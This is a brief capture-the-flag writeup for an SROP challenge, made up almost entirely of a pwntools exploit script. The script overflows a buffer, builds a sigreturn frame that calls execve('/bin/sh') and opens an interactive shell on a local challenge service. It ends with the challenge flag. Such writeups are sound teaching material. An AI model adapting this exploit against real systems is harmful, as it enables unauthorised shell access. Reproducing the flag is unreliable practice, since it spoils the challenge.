Tags: pwn srop
Rating:
### Writeup
SROP challenge. Exploit script -
```py
#!/usr/bin/env python3
from pwn import *
context.binary = elf = ELF('../src/chall')
io = remote('127.0.0.1', 38894)
# io = gdb.debug([elf.path])
io.readline()
offset = 32
payload = b''
payload += b'A' * 32
payload += pack(0x40101b) # read
payload += pack(0x401047)
frame = SigreturnFrame()
frame.rax = 0x3b # syscall number for execve
frame.rdi = 0x40200f # pointer to /bin/sh
frame.rsi = 0x0 # NULL
frame.rdx = 0x0 # NULL
frame.rip = 0x401047
payload += bytes(frame)
io.send(payload)
sleep(1)
io.send(b'Z'*0xf)
io.interactive()
```
### Flag - n00bz{SR0P_1$_s0_fun_r1ght??}
